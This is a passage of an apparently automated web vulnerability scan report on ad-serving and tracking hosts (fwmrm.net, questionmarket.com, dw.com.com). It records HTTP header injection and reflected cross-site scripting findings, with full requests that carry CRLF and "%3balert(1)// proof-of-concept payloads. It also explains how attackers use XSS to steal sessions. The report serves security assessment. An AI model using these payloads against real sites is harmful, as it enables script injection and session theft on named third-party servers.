GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=d0907%0d%0a2a6cd9637fb&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="b035_5653126437071259818"; _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221071.28800.0.0,"; _wr="g193954"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5345525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b024_5659033786630420863";expires=Mon, 01 Oct 2012 23:01:57 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="87~5.1317596419.0,20487.1317596419.0,^g143516~1.1317596496.0,5.1317596494.0,20487.1317596494.0,20499.1317596496.0,^";expires=Tue, 01 Nov 2011 23:01:57 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317596517.d0907
2a6cd9637fb
.655005~,1317596516.438724.273825~,1317596515.187370371771976350ca34c";alert(1)//8ead72248ab.655005~,1317596514.187370371771976350d8175";8736fa6470f.654718~,1317596513.187370371771976350.654718~655005~679480~,1317596387.43872487b53b22f1e05a28d243232b.273825~,1317596386.87b53b222920b5939f32a6e6.273825~,1317596384.18737037177197635087b53b22e29de1a420b69342.654718~,1317596383.87b53b229c5aed6da551a5cf.654718~,";expires=Tue, 01 Nov 2011 23:01:57 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1317596515.337.685841~690141~,1317596449.33787b53b226a68f4f6b137aad7.685841~690141~,1317596447.87b53b22bcb46643d9adc951.690141~,";expires=Tue, 01 Nov 2011 23:01:57 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1317596514.588.1.1,";expires=Tue, 01 Nov 2011 23:01:57 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg143516.1317596127.1317596517.28800.0.0,";expires=Tue, 01 Nov 2011 23:01:57 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Tue, 01 Nov 2011 23:01:57 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10436
Pragma: no-cache
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:01:56 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...

1.3. http://1c6e2.v.fwmrm.net/ad/l/1 [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The value of the cr request parameter is copied into the Location response header. The payload 88a05%0d%0af80ac945c86 was submitted in the cr parameter. This caused a response containing an injected HTTP header.

Request

GET /ad/l/1?s=b136&t=13175961279058596&adid=655005&reid=346533&arid=0&auid=&cn=defaultImpression&et=i&_cc=655005,346533,,,1317596127,1&tpos=&init=1&cr=88a05%0d%0af80ac945c86 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5345525d5f4f58455e445a4a423209; _sid="b136_5659032274802168719"; _uid="b035_5653126437071259818"; _pr="1317596127.187370371771976350.655005~,"; _sc="sg143516.1317596127.1317596127.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 302 Found
Set-Cookie: _uid="b116_5659033498867353162";expires=Mon, 01 Oct 2012 23:01:27 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="87~5.1317596419.0,20487.1317596419.0,^g143516~5.1317596487.0,20487.1317596487.0,^";expires=Tue, 01 Nov 2011 23:01:27 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317596486.187370371771976350.654718~655005~,1317596387.43872487b53b22f1e05a28d243232b.273825~,1317596386.87b53b222920b5939f32a6e6.273825~,1317596384.18737037177197635087b53b22e29de1a420b69342.654718~,1317596383.87b53b229c5aed6da551a5cf.654718~,";expires=Tue, 01 Nov 2011 23:01:27 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1317596486.337.685841~690141~,1317596449.33787b53b226a68f4f6b137aad7.685841~690141~,1317596447.87b53b22bcb46643d9adc951.690141~,";expires=Tue, 01 Nov 2011 23:01:27 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1317596475.588.1.1,";expires=Tue, 01 Nov 2011 23:01:27 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg143516.1317596127.1317596487.28800.0.0,";expires=Tue, 01 Nov 2011 23:01:27 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Tue, 01 Nov 2011 23:01:27 GMT;domain=.fwmrm.net;path=/;
Location: 88a05
f80ac945c86

Content-Length: 0
Date: Sun, 02 Oct 2011 23:01:26 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


1.4. http://amch.questionmarket.com/adscgen/st.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 1fa47%0d%0af0b477bcb63 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=873769&site=71710862&code=1fa47%0d%0af0b477bcb63&randnum=2250638 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 22:58:52 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Sat, 02-Oct-2010 22:58:52 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_873769-1-6; expires=Thu, 22-Nov-2012 14:58:53 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_928398-C|@~M-0_873769-]|@~M-j1; expires=Thu, 22-Nov-2012 14:58:53 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=873769&site=14-71710862-&code=1fa47
f0b477bcb63

Content-Length: 0
Content-Type: text/html


1.5. http://dw.com.com/clear/c.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dw.com.com
Path:   /clear/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ec08b%0d%0a7aef034c3c1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/ec08b%0d%0a7aef034c3c1?onid=1&ptid=2000&ts=1317596108798&sid=164&ld=www.cbs.com&ldc=12d3164c-913c-4d28-915b-dcb441c60b0d&oid=2000-1_164-0&brflv=10.3.183&brwinsz=1074x850&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&srcurl=http%3A%2F%2Fwww.cbs.com%2F&title=CBS%20TV%20Network%20Primetime%2C%20Daytime%2C%20Late%20Night%20and%20Classic%20Television%20Shows HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cbs.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8IL05erE98AAAAVzE

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:01:09 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.cbs.com/clear/ec08b
7aef034c3c1
?ts=1317596469142242&clgf=Cg8IL05erE98AAAAVzE
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif


2. Cross-site scripting (reflected)  previous
There are 258 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://1c6e2.v.fwmrm.net/ad/g/1 [asid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the asid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c73b8"%3balert(1)//709e783100b was submitted in the asid parameter. This input was echoed as c73b8";alert(1)//709e783100b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1c73b8"%3balert(1)//709e783100b&asnw=&caid=&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=187370371771976350&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="b035_5653126437071259818"; _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221071.28800.0.0,"; _wr="g193954"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5345525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b116_5659033498867353162";expires=Mon, 01 Oct 2012 23:00:49 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="87~5.1317596419.0,20487.1317596419.0,^g143516~1.1317596446.0,5.1317596420.0,20487.1317596420.0,20499.1317596446.0,^";expires=Tue, 01 Nov 2011 23:00:49 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317596449.187370371771976350.654718~655005~,1317596443.438724.273825~,1317596387.43872487b53b22f1e05a28d243232b.273825~,1317596386.87b53b222920b5939f32a6e6.273825~,1317596384.18737037177197635087b53b22e29de1a420b69342.654718~,1317596383.87b53b229c5aed6da551a5cf.654718~,";expires=Tue, 01 Nov 2011 23:00:49 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1317596449.33787b53b226a68f4f6b137aad7.685841~690141~,1317596447.87b53b22bcb46643d9adc951.690141~,1317596446.337.685841~690141~,";expires=Tue, 01 Nov 2011 23:00:49 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1317596440.588.1.1,";expires=Tue, 01 Nov 2011 23:00:49 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg143516.1317596127.1317596449.28800.0.174,";expires=Tue, 01 Nov 2011 23:00:49 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10686
Pragma: no-cache
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:00:48 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
}]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"187370371771976350", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1c73b8";alert(1)//709e783100b", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"adReferenc
...[SNIP]...

2.2. http://1c6e2.v.fwmrm.net/ad/g/1 [caid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the caid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e823d"%3balert(1)//fb691e1ccbe was submitted in the caid parameter. This input was echoed as e823d";alert(1)//fb691e1ccbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=e823d"%3balert(1)//fb691e1ccbe&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=187370371771976350&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="b035_5653126437071259818"; _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221071.28800.0.0,"; _wr="g193954"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5345525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b116_5659033498867353162";expires=Mon, 01 Oct 2012 23:01:10 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="87~5.1317596419.0,20487.1317596419.0,^g143516~1.1317596446.0,5.1317596420.0,20487.1317596420.0,20499.1317596446.0,^";expires=Tue, 01 Nov 2011 23:01:10 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317596470.187370371771976350.654718~655005~,1317596387.43872487b53b22f1e05a28d243232b.273825~,1317596386.87b53b222920b5939f32a6e6.273825~,1317596384.18737037177197635087b53b22e29de1a420b69342.654718~,1317596383.87b53b229c5aed6da551a5cf.654718~,";expires=Tue, 01 Nov 2011 23:01:10 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1317596469.337.685841~690141~,1317596449.33787b53b226a68f4f6b137aad7.685841~690141~,1317596447.87b53b22bcb46643d9adc951.690141~,";expires=Tue, 01 Nov 2011 23:01:10 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1317596440.588.1.1,";expires=Tue, 01 Nov 2011 23:01:10 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg143516.1317596127.1317596470.28800.0.174,";expires=Tue, 01 Nov 2011 23:01:10 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10328
Pragma: no-cache
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:01:10 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"187370371771976350", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{customId:"e823d";alert(1)//fb691e1ccbe", id:"-1", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"a
...[SNIP]...

2.3. http://1c6e2.v.fwmrm.net/ad/g/1 [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the csid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2e94"%3balert(1)//153f43ad13b was submitted in the csid parameter. This input was echoed as b2e94";alert(1)//153f43ad13b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=438724&csid=fox_homeb2e94"%3balert(1)//153f43ad13b&resp=ad;position=1;ptgt=s&envp=g_js&slid=172x235slot1&w=172&h=235 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="b035_5653126437071259818"; _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221071.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5656
Pragma: no-cache
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 22:59:55 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
ndow._fw_slot_urls.length) setTimeout(f, 10);
       setTimeout(d, 15000);
   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=-1&ssnw=&csid=fox_homeb2e94";alert(1)//153f43ad13b&sfid=&cdid=&pvrn=438724&vprn=&vip=50.23.123.106&vdur=&flag=;position=1&;ptgt=s&slid=172x235slot1&envp=g_js&w=172&h=235&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentL
...[SNIP]...

2.4. http://1c6e2.v.fwmrm.net/ad/g/1 [pvrn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the pvrn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d153"%3balert(1)//aad410652c8 was submitted in the pvrn parameter. This input was echoed as 5d153";alert(1)//aad410652c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=4387245d153"%3balert(1)//aad410652c8&csid=fox_home&resp=ad;position=1;ptgt=s&envp=g_js&slid=172x235slot1&w=172&h=235 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="b035_5653126437071259818"; _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221071.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5662
Pragma: no-cache
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 22:59:48 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
setTimeout(f, 10);
       setTimeout(d, 15000);
   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=fox_home&sfid=&cdid=&pvrn=4387245d153";alert(1)//aad410652c8&vprn=&vip=50.23.123.106&vdur=&flag=;position=1&;ptgt=s&slid=172x235slot1&envp=g_js&w=172&h=235&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       do
...[SNIP]...

2.5. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the slid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea261"%3balert(1)//192f5f5f8da was submitted in the slid parameter. This input was echoed as ea261";alert(1)//192f5f5f8da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=438724&csid=fox_home&resp=ad;position=1;ptgt=s&envp=g_js&slid=172x235slot1ea261"%3balert(1)//192f5f5f8da&w=172&h=235 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="b035_5653126437071259818"; _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221071.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5858
Pragma: no-cache
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:00:12 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
;
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=fox_home&sfid=&cdid=&pvrn=438724&vprn=&vip=50.23.123.106&vdur=&flag=;position=1&;ptgt=s&slid=172x235slot1ea261";alert(1)//192f5f5f8da&envp=g_js&w=172&h=235&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       document.addEventListener( "load", e, false );
   } else if (window.attachEve
...[SNIP]...

2.6. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the slid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e863b'%3balert(1)//2cbc42ff0ae was submitted in the slid parameter. This input was echoed as e863b';alert(1)//2cbc42ff0ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=438724&csid=fox_home&resp=ad;position=1;ptgt=s&envp=g_js&slid=172x235slot1e863b'%3balert(1)//2cbc42ff0ae&w=172&h=235 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
